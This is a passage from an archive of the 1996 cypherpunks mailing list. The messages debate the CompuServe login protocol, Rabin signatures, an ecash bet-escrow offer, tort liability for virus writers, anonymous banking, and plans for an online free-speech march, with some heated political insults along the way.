but off-topicness.)  Perhaps we could just drop the 
"Cc: cypherpunks" part and continue this discussion?


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMX4F7EjbHy8sKZitAQHOgQMAn3+no8l1gYl9jpS0V5IFwK2WwOVRlkY4
cp1h7GEE1uW/Ky/djlOkfHfrbsfIoDSwr4N6dUZAhyhyjWu9eDXwdoLHGLdROR72
sMBnmsd/QrJ02Mptywt52wqCXN1iDkzz
=yv4l
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 24 Apr 1996 14:37:54 -0700 (PDT)
To: "Louis Freeh and his friends at yvv.com" <cypherpunks@toad.com>
Subject: Militias, reputation capital, unfounded rumor-mongering, and the DNS
Message-ID: <Pine.GUL.3.93.960424121254.19618H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Anatomy of a paranoid troll:

http://fight-censorship.dementia.org/fight-censorship/dl?thread=FBI+monitoring+Freemen+FTP+sites,+snooping+on+%22patriot%22+email?&after=2275&type=short

Someone sent a message to Declan alleging that the FBI, with the
cooperation of ISPs, was reading/disrupting/censoring the email of people
interested in "patriot"  movements. Declan said hmm, I can see the FBI
doing that, and forwarded the message to fight-censorship. I pointed out
that the story was complete bullshit, which is easily verified (yvv.com's
incompetence in managing their DNS affects all users, including
postmaster@yvv.com, not just the paranoid), but evidently my reputation
capital on the moderated fight-censorship list is so low that instead of
my objections, subscribers to the fight-censorship list got to read
another, more paranoid rant. 

I do not expect this story to die, even though it's completely false --
it's too good. The meme in the subject line is awfully strong, lots of
people won't take the time to read more than the title, and who really
listens to a FUCKING STATIST anyway. 

Truth is indeed stranger than fiction, but seldom in the way you think.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 24 Apr 1996 14:37:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: RISKS: Compuserve "secure" login
Message-ID: <199604242010.NAA02828@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 04 Apr 1996 19:34:12 +0200
>From: Heinz-Bernd Eggenstein <eggenste@noether.informatik.uni-dortmund.de>
>Subject: CompuServe's "secure login protocol": two steps forward, one back
>Summary: a new CompuServe Information Service (CIS) logon protocol was
>designed to prevent passive and active attacks (where the attacker
>impersonates a CompuServe node) but a flawed implementation in the
>WinCIM 2.0(.1) client software still allows active attacks.
...
>  ....  HR=UR=MD5(S|Z|RA|RB|S) ....
>I notified CIS about these weaknesses and I was informed that they are
>"fixed" now, no details were given about the fix (source: Britta Herbst,
>German customer support (11111.754@compuserve.com)).
...
>I think this a good example how to half-ruin a good protocol by embedding it
>into carelessly written code.

In addition to the posted weaknesses (which were mainly implementation issues),
there's another major problem with this - it means that the user's passwords
have to be stored on the Host machine (or an authentication server) in 
_plaintext_, rather than storing a hash (e.g. like Unix passwords.)
This means that if the host's password file is cracked, the entire system loses.

You can do a little better than this by having the password file encrypted
with a key which the login process / authentication server has, requiring 
theft/cracking of that key (difficult) as well as theft of the password file;
the encryption could either be a symmetric-key system or public-key if you're
willing to spend the decryption time, which CompuServe probably isn't.

A couple years ago I found an obvious application of Diffie-Hellman which
avoids this problem; unfortunately it turned out to be patented by someone
from Siemens (first as a German patent and then a US patent, so it's
definitely too much trouble to try to overturn the patent...)
The basic approach is to use a commutative hash function, which lets
both sides calculate HA(B) == HB(A) ; modular exponentiation worked fine.

Of course, if you're allowing active attacks, there's always session
hijacking...
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Wed, 24 Apr 1996 04:49:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: arbiter/escrow agent for hire
Message-ID: <199604241149.NAA27753@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I hereby offer to be arbiter and escrow agent for 
cypherpunks bet settlements.  My conditions:


1.  I won't deal in old-fashioned currencies.  Mark Twain
U.S. Dollar ecash or Merita Bank of Finland Finnish Mark
ecash or First Digital Bank cyberbuck ecash only, please.

2.  I don't handle bets larger than USD300.00, or 
FIM1500.00, or cyb300,000.00.  These are just my arbitrary 
comfort limits.  (It's also large enough to cover the kinds 
of things that go on here, IMESHO.)

3.  My fee per bet is USD5.00 or FIM50.00, or cyb7000.00.  
This is for "simple", winner-take-all bets.  For other
arrangements, make me an offer.

4.  I have to have an explicit description of how the bet
will be settled which is acceptable to me.  This will be
known as the "bet description".
 a.  It has a dearth of loopholes and ambiguities, both with
       regard to the subject of contention and with regard
       to the settling procedure, including settling agents
       and settling schedule.
 b.  It doesn't require me to be the "settling agent" who
       does the research or performs the experiment or
       whatever.


Before I am committed to the job I will require 3 items to
be submitted to me:

1. Acceptable digital signature upon the "bet statement" 
from each bettor.  (Note that PGP signatures from PGP key
pairs which are not connected to me via the Web of Trust, or
which are not verifiable by me via an out-of-band
connection, are not acceptable digital signatures.  This is
because of the MITM attack problem, not because  I need True
Names to be connected to the signatures.)
2. My fee.  (I don't care who pays it--  One or both bettors
or spectators.)
3. Amount of the bet from each bettor.  This chunk of money
will be known as the "ante".  Note that depending upon the
details of the "bet statement", each bettor may submit a
different ante.  (Yes, up front.  Yes, I get antes from both
bettors.  Yes, I keep them while the bet is being settled.  
Why do you think my fee is so low?)




Final Notes:


1.  I reserve the right to reject any bet for any reason.  
Although my fee is non-refundable, the antes are refundable
in this case.  If I exercise this right after the antes 
have been delivered, I will return them to their respective
owners.

2.  The bettors may _not_ unilaterally or unconditionally 
reserve the right to cancel the bet after having signed the
bet statement and submitted their antes.  Provisions for 
cancelling the bet after that point, if desired, should be 
written into the bet statement.

3.  I don't do currency exchange.  If your betting partner
submits his ante in Finnish Marks and you win then you are
getting Finnish Marks.  If you submit an ante in cyberbucks
and then I cancel the bet, you are getting cyberbucks
refunded to you.





Please contact me via e-mail (PGP preferred) if you wish to 
engage my services.


Cordially,

Bryce,
Escrow and Arbitration Agent Serving the cypherpunks Mailing
List Since 1996.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMX4VUkjbHy8sKZitAQGOQwMAzsITvGj54RvUnwr0DWXbtbiQeMRIOZMv
igN2qUVArkP8TsC8/KkMaSlxD1jEVdGcDj+UGegLIO8Jfq62NCkz41LSUSNi1nWY
0/pNUikhSAFZ2DAh6u42K45HmhPAypeC
=eS7Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 24 Apr 1996 14:39:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Rabbi Hier Testimony
In-Reply-To: <01I3VYLGPR4W8Y4ZTJ@mbcl.rutgers.edu>
Message-ID: <AlTadgO00YUvERbGhW@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 23-Apr-96 Re: Rabbi Hier Testimony
by Declan McCullagh@CMU.EDU 
> The EF Canada web pages also detail how the SWC has been trying to get
> the Canadian equivalent of the FCC to regulate the Internet. The ACLU
> reports at the URL above how the SWC has tried the same trick here in
> the U.S.


While I'm at it, I should offer my prediction that the Southern Poverty
Law Center likely will become active in attempts to regulate and control
the Net.

To the SPLC, bomb-building and other, um, incendiary information should
be restricted. In today's Washinton Post, Morris Dees, the Center's
co-founder, indicates that a book Timothy McVeigh read influenced him to
bomb the Oklahoma City building.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 24 Apr 1996 14:38:07 -0700 (PDT)
To: bryce@digicash.com
Subject: Re: arbiter/escrow agent for hire
In-Reply-To: <199604241149.NAA27753@digicash.com>
Message-ID: <199604241913.PAA12632@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


bryce@digicash.com writes:
>3.  My fee per bet is USD5.00 or FIM50.00, or cyb7000.00.  
>This is for "simple", winner-take-all bets.  For other
>arrangements, make me an offer.

Wouldn't it be more reasonable for the fee to be something like 2%?  It
seems odd that to have a $2 bet settled you'd need to pay $5.  And
since the ante is required before the bet is formalized, why not just
take your cut out of the winnings?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 24 Apr 1996 14:23:16 -0700 (PDT)
To: Hal <hfinney@shell.portal.com>
Subject: Re: Golden Key Campaign
In-Reply-To: <199604241415.HAA02557@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.93.960424141313.12174A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996, Hal wrote:

> Rabin encryption would have the advantage that it could be used with
> existing RSA keys as long as the modulus is a Blum modulus.  PGP at least
> has always used Blum moduli, perhaps for this eventuality.  So an
> alternative encryption program could use Rabin encryption and work with
> the existing infrastructure of PGP keys.  It would not of course be
> compatible with PGP for encryption and decryption.
> 
> This doesn't solve the signature problem; I'm not sure if there is a
> signature algorithm which could use RSA public keys but which is not
> covered by the RSA patent.  In any case since PGP key certificates use
> RSA signatures it would not appear to be possible to validate key
> signatures without infringing on the RSA patents, so that cancels out a
> lot of the advantages of using existing PGP keys.

You can do signatures with Rabin too.  I have a version of it in
Crypto++ 2.0.  It's been out for a while and RSA hasn't bothered me about
it.

Does anyone want to explain why, given the alternatives, people continue
to use RSA and pay for it?

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Wed, 24 Apr 1996 14:56:05 -0700 (PDT)
To: jimbell@pacifier.com (jim bell)
Subject: Re: [NOISE] Re: Nazis on the Net
In-Reply-To: <m0uBttS-000918C@pacifier.com>
Message-ID: <199604242150.OAA17194@well.com>
MIME-Version: 1.0
Content-Type: text


> The government spent about $1.5 million to get a minor, first-time (alleged) 
> criminal.  There is no obvious or logical basis for such extreme interest, 
> even in hindsight based on what we now know.  An objective person analyzing 
> this would have to conclude that the government's interest in Weaver was 
> entirely different than what it was claimed to be, and if it was that 
> important it is logical to conclude that fraud was not beyond their 
> capability and motivation.  Given the fact that the 
> government actually faked evidence in the trial (photographs of shell 
> casings), a fact that was brought out during trial, anything they say is not 
> believable.

Could it be that the operatives at Ruby Ridge were simply incompetent?

-- 

Jon Lebkowsky <jonl@wired.com>                     http://www.well.com/~jonl
Electronic Frontiers Forum, 7PM PST Thursdays  <http://www.hotwired.com/eff>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Apr 1996 14:38:34 -0700 (PDT)
To: bryce@digicash.com
Subject: Re: arbiter/escrow agent for hire
Message-ID: <01I3X9N6RA1W8Y50LP@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"bryce@digicash.com" 24-APR-1996 10:05:20.14

>1. Acceptable digital signature upon the "bet statement" 
>from each bettor.  (Note that PGP signatures from PGP key
>pairs which are not connected to me via the Web of Trust, or
>which are not verifiable by me via an out-of-band
>connection, are not acceptable digital signatures.  This is
>because of the MITM attack problem, not because  I need True
>Names to be connected to the signatures.)

	IIRC, currently Black Unicorn doesn't have any signatures on
his public key of others. Therefore, this requirement, while understandable,
could cause a bit of a difficulty in the current situation.

>3. Amount of the bet from each bettor.  This chunk of money
>will be known as the "ante".  Note that depending upon the
>details of the "bet statement", each bettor may submit a
>different ante.  (Yes, up front.  Yes, I get antes from both
>bettors.  Yes, I keep them while the bet is being settled.  
>Why do you think my fee is so low?)

	Chuckle.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Apr 1996 14:38:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Anonymous banking
Message-ID: <01I3X9YJ35NE8Y50LP@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Speaking of the below information, what is anonymous banking like in
Austria, Colombia, Venezuela, and Thailand?
	-Allen

>Copyright 1996 Nando.net
>Copyright 1996 Reuter Information Service

>VIENNA (Apr 24, 1996 11:18 a.m. EDT) - The United Nations, fighting a
>rearguard action against illegal drugs and money laundering, on Wednesday
>turned its fire on sloppy banking laws and called on all states to ban
a>nonymous accounts.

[...]

>Experts say anonymous bank accounts are a safe haven for drugs money and
>are an ideal vehicle for laundering cash.

>They say the drugs trade must be attacked at its roots by cracking down on
>transfers of narcotics-based "dirty money."

[...]

>Drug barons use a number of ruses including anonymous bank accounts and
>specially set up front businesses, such as restaurants, to channel large
>sums of money and obscure its origins. The money comes out "clean," or
>laundered.

>Helmut Butke, who chaired the meeting of the 53-member Commission of
>Narcotic Drugs, said the United States was the main sponsor of the
>resolution which seeks to streamline and increase international cooperation
>against money laundering.

>The draft resolution, which was shown to Reuters, "urges states to prohibit
>banks and other financial institutions from offering accounts identified
>only by a number, anonymous accounts or accounts in obviously false names."

>It also urges states "to take all reasonable measures to ensure that such
>institutions are informed of the identities of beneficial customers in all
>transactions."

[...]

>Austria, the only country in the EU which allows anonymous bank accounts,
>was adamant its current legislation did not run counter to the resolution.

[...]

>The Vienna government is clinging on to its banking system, saying the
>accounts were useless for money laundering as they do not extend to
>deposits over 200,000 schillings ($19,000).

>But Washington last year ranked Austria alongside Colombia, Venezuela and
>Thailand in a league table of nations that tolerate money laundering.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 24 Apr 1996 14:37:48 -0700 (PDT)
To: abostick@netcom.com (Alan Bostick)
Subject: Re: EYE_suk
In-Reply-To: <pKnfx8m9LANQ085yn@netcom.com>
Message-ID: <199604241938.PAA07049@nrk.com>
MIME-Version: 1.0
Content-Type: text


> > (BTW, it's worth wondering what restrictions there'd be if it were
> > not for an ENORMOUS turf battle between them & Jill Edgar Hoover.)
> 
> Or, if Hoover had won that battle and acquired control of foreign 
> intelligence, just how much more like Lavrenti Berya he would have 
> become.

Hoover did win, AFAICAT. He got domestic contelpro.
James Jesus was shut out....

FI? I doubt anyone outside of JEH ever thought he'd get that.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 24 Apr 1996 16:03:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Rabbi Hier Testimony
In-Reply-To: <AlTadgO00YUvERbGhW@andrew.cmu.edu>
Message-ID: <Pine.GUL.3.93.960424160212.19618N-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 24 Apr 1996, Declan B. McCullagh wrote:

> Excerpts from internet.cypherpunks: 23-Apr-96 Re: Rabbi Hier Testimony
> by Declan McCullagh@CMU.EDU
> > The EF Canada web pages also detail how the SWC has been trying to get
> > the Canadian equivalent of the FCC to regulate the Internet. The ACLU
> > reports at the URL above how the SWC has tried the same trick here in
> > the U.S.

The majority of what you said in that message was misleading at best, but
I haven't said anything because that's off topic, and who listens to a
FUCKING STATIST anyway. I know you don't have time to correct any
acknowledged errors on you web pages, so why should I waste my time
pointing them out?

Since we all agree that the SWC is in the wrong, we need something to talk
about. Let's just agree up front that the size of your dick is
proportional to the fervor of your denunciation of the Simon Wiesenthal
Center, facts notwithstanding. So far, I believe Tim wins because he
called them "Jew Nazis," but keep working at it. Maybe if you're lucky,
you'll earn the George Orwell Free Speech Award: 

 http://www.almanac.bc.ca/cgi-bin/ftp.pl?people/b/botting.gary

> While I'm at it, I should offer my prediction that the Southern Poverty
> Law Center likely will become active in attempts to regulate and control
> the Net.

Sure, why not. It's probably true that they'll try. Being a bunch of
idealogues, I don't imagine that they'll realize, as Sameer points out,
that *they* are considered an anti-government group. 

> In today's Washinton Post, Morris Dees, the Center's co-founder, 
> indicates that a book Timothy McVeigh read influenced him to bomb the
> Oklahoma City building. 

Morris Dees is certainly not the only person to speak of this influence.
Try Terry Nichols and McVeigh's sister.

Said book being The Turner Diaries, which, like the Goebbels book that
your web page says is "banned," is being published without censorship. It
tells the story of The Order, a white supremacist group that overthrows
the US government through random acts of terror and violence against
political, cultural, and economic targets. There happens to have been a
real terrorist organization that called itself The Order, led by a bunch
of National Alliance members. You may have heard of Bob Mathews.  Now The
Order has resurfaced in Spokane Valley; some bombings and bank robberies
went down in early April, to some applause on the Neo-Nazi lists. 

The Turner Diaries has always been available through the National Alliance
Neo-Nazi criminal organization, whose leader wrote it.  If you want to
read this book, I will personally send you a copy of the National Alliance
edition. 

The Turner Diaries is now going to be published by the more mainstream
Barricade Books as well. Good for them. I really don't like the idea of
sending the National Alliance any more money.

There was a flurry of controversy about the new edition, to which the
publisher, Lyle Stewart, responded in, of all places, Liz Smith's widely
syndicated "Grapevine" column, thusly: 

  "I couldn't help recall a similar controversy that raged when a major
American publishing house issued Adolf Hitler's 'Mein Kampf.' Should such
a book be published? To me the answer was self-evident. Of course, it
should have been. People should be able to read and understand what
Hitler was about.
  "By the same reasoning, I believe most people think militias and related
groups like the Freemen are fun-loving, beer-drinking gun fanatics who
like to shoot rabbits and deer. Not so. They hate democracy. They hate our
government and all officials who represent it. They practice racism and
terrorism. Is this something that only the Drug Enforcement Agency and the
FBI and CIA should know, or do you have a right to know and understand it,
too?"

So yes, Morris Dees is a fool, and so are you.

- -rich
 http://www.c2.org/~rich/Not_By_Me_Not_My_Views/rebuttal.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMX6y0I3DXUbM57SdAQFtdgP/WtwaNLaStTpVazuNLNUBbswGcvrRf8s2
ybwLMyMYxZamLwvjv45Zz+tT8AiSaZj3R1ACPDppR7s4UDC9/JrecIUeufVOGara
fVK8q8j1qwiyvLNqT+nffa2SqCPHIZMIvagv+yFu8I9zBrNwu2h9aKNYRr8OXS88
ifiTEzJDmNA=
=UAMc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 14:34:19 -0700 (PDT)
To: Scott Brickner <sjb@universe.digex.net>
Subject: [NOISE- Legal Theory] Reasonable people
In-Reply-To: <199604241648.MAA05361@universe.digex.net>
Message-ID: <Pine.SUN.3.93.960424150105.25996G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996, Scott Brickner wrote:

> Black Unicorn writes:
> >On Tue, 23 Apr 1996, Scott Brickner wrote:

> >> As such, persons with limited
> >> training in manipulating biological viruses are expected to avoid doing
> >> so.  Individuals *with* training are expected to take adequate
> >> precautions to avoid their spread.  I see no reason why electronic
> >> viruses shouldn't be treated similarly.  If you're going to write them,
> >> you *better* take steps to prevent their release, or you are liable for
> >> the damages.
> >
> >Now you jumped the argument a bit.  There is a difference in holding
> >someone to a reasonable standard generally, and defining several standards
> >based on the experience of the person to which the standard is being
> >applied.
> 
> I'd argue that I'm holding everyone to the same standard:  either know
> the safe ways of handling viruses and follow them, or don't handle them
> at all.

Now you have to get into the question of who is a trained virus handler.
This is a subjective analysis.  The court is going to have to do this case
by case.  And below in your message its clear you do not hold everyone to
the same standard.  The virus/CPR expert is held to a different standard
in your example.  It is the same standard in that you punish everyone if
they "Do something stupid."  But "stupid" is different for each person.

> You seem to imply that I'd hold the untrained virus writer
> harmless.  No way.  He's reckless and *should* be liable.

I indicated only that the standards you had for trained and untrained
virus writers were different.

> When one has
> training, it's no longer reckless to simply handle (or write) the
> virus, but disregarding safe procedures is negligent.

See my above position.  Three standards.  One for those with training,
one for those without and some kind of standard for determining what is
'enough' training.  Given the traditional institutional costs of courts,
particularly their 'catch up' chase with technology, I don't think I'd
want courts doing these calculations.
 
> >This latter approach is often called (jokingly by some) the Objective
> >Subjective Standard.  (Objective standard being without consideration of
> >the view of the individual being judged, subjective including that view,
> >and object subjective being the consideration of what the general class of
> >individual would do without consideration of the individual's specific
> >view).
> >
> >(What would a reasonable virus writer do is distinct from what a
> >reasonable Bob Dwyer, Ph.D. Computer science might do is distinct from
> >what a reasonable person might do).
> >
> >Many courts reject higher (or lower- there are arguments for this 
> >too) standards of care for experts than for lay persons or other
> >non-experts in tort cases, prefering to impose the "reasonable person"
> >(Reasonable man for those of you who went to law school before 1985)
> >standard universially.
> 
> I assume that a canonical example of the lower-standard case is the
> "Good Samaritan" laws which reduce the liability of a trained person
> performing rescue activities (e.g., administering CPR).

Yes.

> It seems to me that the "reasonable person" isn't the real issue
> there.  Someone with training ought to be expected to do the "right"
> thing.  If you're trained to administer CPR, and you do it *wrong*, you
> shouldn't be absolved of liability -- you're negligent.

But the other argument goes that we have to give the people who know what
they are doing more leeway because they will be judged by people who don't
know about the subject and because if we want to encourage good samaritans
the way to do it is not by increasing their liability.  (You effectively
do increase their liability above by implying that you would like to
impose a stricter negligence standard for trained CPR types).

Keep in mind that doing the "wrong" thing isn't always negligence either.
Doing the wrong thing because you were careless, that's negligence.

Also note that you can be negligent without harming anyone.

It could be argued that it's folly to impose a lower standard on the CPR
'idiot' and thus encourage him to run out and do CPR.  One can imagine a
scene where the CPR trained fellow pulls an idiot out of the crowd and
gives instructions for the idiot to preform the CPR so as to take
advantage of both his increased knowledge and the idiot's limited
liability (reasonable person standard, not reasonable CPR expert
standard).

> If you don't
> know anything about CPR (except what you've seen on "Baywatch"), then
> we're back to what a "reasonable person" should do.

That probably includes not trying to preform CPR... no?

> If you're trained
> and you do it right, but the person is still injured by your actions,
> limiting your liability is society's way of encouraging you to use
> your training for the common good.

This begins to look like the partial abortion debate, where the argument
goes something like this:

Yes, it's criminal to preform the procedure, but you can absolve yourself
after the fact by showing us (medical morons) that the mother's life was
in danger.

That's not encouraging in the least to doctors.  (Which in the abortion
example, is precisely the point).

The trick is in your concept of "and you do it right."  That's a
subjective analysis.

> In my mind, the difference between the objective standard and the
> subjective one marks the difference between recklessness and
> negligence.  If an objective "reasonable person" wouldn't do it, it's
> reckless.  If a subjective "reasonable person" wouldn't, it's
> negligent.

This makes it REALLY tough.  Reckless usually means extensive punative
damages are on the way.  Simple negligence doesn't always trigger them.
By using these terms on the same facts the idiot gets simple negligence,
the expert gets expanded liability and potential punative damages.

Because the expert will be at significant disadvantage at trial (if he's
an expert, if he knew what he was doing, why did the victim get hurt) what
you've done is moved closer to the realm of strict liability for all
experts. (Strict liability simply eliminates the negligence calculation.
If you were doing the activity, (CPR) and someone got hurt, you're liable.
Period.  No calculation of fault).  What this system does is create
something like a rebuttable presumption of negligence on the expert.  That
starts to look like strict liability.

> Perhaps these aren't the "legalese" usages of the terms, but it seems
> reasonable to me.

It creates systemic problems though.  (Like the burden of overcoming the
assumption that the expert must have erred).

> >If there is interest, I will post exerpts of the arguments on both sides
> >of this issue with the header [Noise].
> 
> I'd be interested.

In an economic sense you want a negligence rule that balances a few
interests.  First, you want to either encourage or discourage the
activity.  (Virus work or CPR by the side of the road have different
calculations).  Second, you want to give injured persons the chance to
recover damages.  Third, you want to decrease the total number of
accidents or injuries as much as possible.

A lot of the decision whether to apply strict liability or negligence is
going to be based on where you believe the costs should be shifted.
Strict liability shifts the costs onto the person engaging the activity.
The actor will increase his own costs to the extent he can still conduct
the activity and still reduce the number of times he is called into court
and damages are awarded against him.  He will, of course, take no more
care than his damages might be.  If the largest ever award for a CPR
related injury is $500,000, no one is going to spend more than that
in increased care.  The same calculation will be made with negligence, 
but the costs will more often be shifted to the victim.  "The defendant
will just take those precautions that minimize the sum of accidents and
the costs of their prevention, whether negligence or strict liability is
in place."  Epstein, Torts 5d., 166 (1990).

What you really want to do, economically, is shift the cost onto the party
most able to bear the cost.  ("Least Cost Avoider").  This will allow the
return of damages with the least economic impact after the fact, and
increase the amount of care exerted by the next Least Cost Avoider ex
ante.

It's interesting to note the argument that in the age of insurance, it
really makes no difference who you put the costs on as society as a whole
ends up footing the bill anyway.

While holding experts to a higher standard makes some sense where experts
are holding themselves out to be experts for marketing and reputation,
when they are preforming acts like CPR and such you have to consider the
possibility that a careless expert is better than a competent layman.

For full treatments, See e.g., Shavell, Economic Analysis of Accident Law
(1987); Rosenbaum, The Degree of Skill and Care Legally Required of a
Medical or Surgial Specialist, 49 Medico-Legal J. 85 (1932); Eddy,
Professional Negligence (1955); D. Parlett, Professional Negligence
(1985); Comment: Professional Negligence, 121 U.Pa.L.Rev. 627 (1973).

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 24 Apr 1996 16:45:15 -0700 (PDT)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Meta: The Arguing about the Terms of the Wager Continues
Message-ID: <2.2.32.19960424234500.006b43ec@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

Tim May wrote:

>Frankly, I thought that Black Unicorn claimed to have seen 
>the error of his ways (in terms of debating with Bell) and 
>was going to stop?

Since declaring victory, Unicorn has said far less about the
wager than has Tim.  When it comes to wasting bandwidth, Tim
might consider removing the boulder in his own eye before 
going after the mote in someone else's.

As far as I can see, the wager had its intended effect.  I
only hope that future undocumented pronouncements are dealt
with as effectively.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 24 Apr 1996 16:49:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Electronic Freedom March postponed to Fall 1996
Message-ID: <Pine.SUN.3.91.960424164757.1379C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I'm glad to see that Keith Glass has taken the helm of the Electronic 
Freedom March.

Moving the date back to late September is a good idea:

* We can hold the March before Congress adjourns in early October.
* The date is close to the November elections.
* The Supreme Court will return on October 7 and will, I hope, decide
  to hear our lawsuit challenging the CDA soon after.

Now we have time to organize...

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //


---------- Forwarded message ----------

News Release    24 April 1996 6 PM
Contact: Keith A. Glass  703-354-1737

Changes to the Electronic Freedom March

The Electronic Freedom March on Washington, currently scheduled for June 
30th, 1996, has been re-scheduled to the fall, tentatively the weekend of 
28-29 September.

With the current state of the case against the CDA, ACLU vs. Reno, and 
several organizational factors, it's been concluded that it would be far more 
effective to focus the political power of the citizens of the Net closer to 
the November elections.  

We are currently looking for people to assist us in organizing and sustaining 
the Electronic Freedom March on Washington.  Specifically, we need assistance 
in fundraising and publicity, assistance in obtaining corporate and 
non-profit sponsorships, people familiar with stage and sound systems, crowd 
logistics, first aid, and security.  

Please refer all inquiries to Keith A. Glass, 703-354-1737, salgak@dcez.com
-- 
*   Keith A. Glass,  Annandale, Virginia, USA, Filker/punster at large    *
*           Washington Coordinator, Electronic Freedom March              *
*        30 June 1996, Washington DC   URL: http://www.efm.org            *
*  Note: the following line is an intentional act of Civil Disobedience:  *
*  FUCK THE TELECOMMUNICATIONS DECENCY ACT--DEFEND THE FIRST AMENDMENT !  *






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Hassloch x231 <travis@EvTech.com>
Date: Wed, 24 Apr 1996 15:04:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Crypto Software Review Wanted
Message-ID: <199604242204.RAA03889@tahiti.evtech.com>
MIME-Version: 1.0
Content-Type: text/plain


There's a ton of only semi-organized stuff out there.
I would like structured info... more that just a filename, without having
to install it myself, etc...
Review of the packages would be real nice.

PS: I heard CFS requires having NFS installed (ick!) and someone mentioned
this opens you up to "portmapper assisted attacks"... I've avoided NFS
and RPC until now so I don't know... does this have any credibility?
Will I have to install a firewall to protect NFS just so I can use CFS to
encrypt on disk? :)

CC me in the replies please, since I'm not on the list...
 although I might get on coderpunks if the volume is small.
Hmm, I just noticed the cypherpunks-ratings list, I wonder if this is what
I'm looking for...  too bad it doesn't have a description or an info file.
--
travis@evtech.com | Virtual Reality Bites | P=NP if (P=0 or N=1)
There's a thin line between an email message and its signature.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 24 Apr 1996 15:43:40 -0700 (PDT)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: [NOISE- Legal Theory] Reasonable people
In-Reply-To: <Pine.SUN.3.93.960424150105.25996G-100000@polaris.mindport.net>
Message-ID: <199604242243.SAA22982@universe.digex.net>
MIME-Version: 1.0
